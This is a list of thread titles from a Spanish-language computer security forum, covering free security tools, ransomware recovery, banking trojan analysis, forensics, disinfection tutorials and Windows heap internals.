Seguridad / MOVIDO: Herramientas gratuitas de seguridad para MAC

Mac OS X / Herramientas gratuitas de seguridad para Mac OS X

Seguridad / Restaurar archivos cifrados por CryptoLocker [Ransomware]

Noticias / Deface a Forospyware por segunda vez

GNU/Linux / Kali Linux - A project of Offensice Security

Seguridad / Plugins para los navegadores (FF, IE, O, M, CD, S)

Análisis y Diseño de Malware / Troyano bancario II (diferente configuración).

Análisis y Diseño de Malware / Troyano bancario

Seguridad / Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección.

Noticias / Vulnerabilidad en cámaras TRENDnet todavía afecta a miles de usuarios

Seguridad / Reverse Engineering Mentoring enfocado al malware en Windows

Seguridad / Cómputo Forense Reloaded - Porque todo deja rastro

Seguridad / Evitar infecciones desde Java y FlashPlayer

Seguridad / Tutorial de análisis del PC con OTL de OldTimer.

Análisis y Diseño de Malware / Malware Analyst´s Cookbook and DVD

Seguridad / Evitar que se instalen barras de navegación de terceros al instalar programas.

Seguridad / Tutorial de análisis de sistemas con AVZ Antiviral Toolkit de Kaspersky

Seguridad / Como eliminar el troyano Flamer (32 y 64 bits)

Seguridad / Tutorial de análisis del PC con SysInspector de ESET

Programación C/C++ / Sobre los "Heap" en Windows

Seguridad / Servicios online para desbloquear Ransomware